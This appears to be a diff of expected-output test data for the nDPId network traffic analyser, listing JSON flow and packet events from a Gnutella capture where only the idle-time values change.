+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":71205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71205,"pkt":"UlQAEjUCCAAn5uVZCABFAAA08yJAAIAG8AwKAAIPVtC0tcRJszsghBY3AAAAAIAC+vCuSgAAAgQFtAEDAwgBAQQC"} 00519{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71216,"flow_last_seen":71216,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":71216,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":71216,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":71216,"pkt":"CAAn5uVZUlQAEjUCCABFwAA4AsYAAP8BoC4KAAICCgACDwMBntkAAAAARQAANGWZQAB\/BrMICgACD0xEis\/EN7AX1ucS7g=="} 00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71216,"flow_last_seen":71216,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":71216,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.521641} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":71312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71312,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAscAAEAGYHFW0LS1CgACD7M7xEkAehIBIIQWOGAS\/\/+\/xQAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":71312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71312,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo8yNAAIAG8BcKAAIPVtC0tcRJszsghBY4AHoSAlAQ+vDckQAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":71313,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":71312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71312,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAscAAEAGYHFW0LS1CgACD7M7xEkAehIBIIQWOGAS\/\/+\/xQAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":71312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71312,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo8yNAAIAG8BcKAAIPVtC0tcRJszsghBY4AHoSAlAQ+vDckQAA"} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":71313,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":71535,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.160.214.137","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":71535,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71535,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnYAAIARfQoKAAIPWKDWiXAJGMoAINufR05EED6TAQFUC1FLUlAGUk5BXS\/iNQlw"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":71535,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":28681,"dst_port":49046,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -374,34 +374,34 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":71540,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71540,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0POoAAIARNbgKAAIPyHjzj3AJGMoAIE6sR05EED6oAQFUC1FLUlAGUk5BXS\/iNQlw"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71541,"flow_last_seen":71541,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":71541,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.100","src_port":28681,"dst_port":46385,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":71541,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71541,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02U0AAIAREUUKAAIPBbQ+ZHAJtTEAICo0R05EED6pAQFUC1FLUlAGUk5BXS\/iNQlw"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":71605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71605,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAswAAEAGY0Nt1prYCgACDxjKxEgAewwBHNfF\/mAS\/\/+29AAAAgQFtA=="} 
-00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":71605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71605,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5AxAAIAGAgYKAAIPbdaa2MRIGMoc18X+AHsMAlAQ+vDTwAAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":71608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1xAAIAGzIMKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xtxAAIAGndcKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iq5AAIAGH9QKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":72156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72156,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VP1AAIAGOuoKAAIPQr0cEcQ6P42S8gLxAAAAAIAC+vBvlwAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":72157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72157,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01LVAAIAGCWcKAAIPAaMO9sQ5MjZr2Fv\/AAAAAIAC+vCZMAAAAgQFtAEDAwgBAQQC"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":72157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72157,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lyhAAIAGNGIKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72264,"flow_last_seen":72264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":72264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72264,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0alNAAIAGzs4KAAIPG16aNcRKGMq+PzReAAAAAIAC+vDiygAAAgQFtAEDAwgBAQQC"} 
-00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72265,"flow_last_seen":72265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72265,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":72265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72265,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cvdAAIAGYVQKAAIPGH8B68RLk7Zj+37vAAAAAIAC+vASugAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72266,"flow_last_seen":72266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72266,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":72266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72266,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VqVAAIAG\/NQKAAIPe8ofccRMTThVM2MAAAAAAIAC+vADHQAAAgQFtAEDAwgBAQQC"} -00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72266,"flow_last_seen":72266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72266,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":72266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72266,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00URAAIAGSiQKAAIPZ+hrZMRNqfSI7oMUAAAAAIAC+vAafwAAAgQFtAEDAwgBAQQC"} 
-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72267,"flow_last_seen":72267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72267,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":72267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72267,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnJAAIAGzTgKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":72462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72462,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAs8AAEAGtlsbXpo1CgACDxjKxEoAfQABvj80X2AS\/\/8GQwAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":72462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72462,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoalRAAIAGztkKAAIPG16aNcRKGMq+PzRfAH0AAlAQ+vAjDwAA"} 
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72264,"flow_last_seen":72463,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":72463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":72471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72471,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAtEAAEAG0LF7yh9xCgACD004xEwAfvQBVTNjAWAS\/\/8ykwAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":72472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72472,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoVqZAAIAG\/N8KAAIPe8ofccRMTThVM2MBAH70AlAQ+vBPXwAA"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72472,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":72595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72595,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAtUAAEAGmJxn6GtkCgACD6n0xE0Af+4BiO6DFWAS\/\/9P9AAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":72596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72596,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo0UVAAIAGSi8KAAIPZ+hrZMRNqfSI7oMVAH\/uAlAQ+vBswAAA"} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72596,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":71605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71605,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAswAAEAGY0Nt1prYCgACDxjKxEgAewwBHNfF\/mAS\/\/+29AAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":71605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71605,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5AxAAIAGAgYKAAIPbdaa2MRIGMoc18X+AHsMAlAQ+vDTwAAA"} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":71608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1xAAIAGzIMKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} 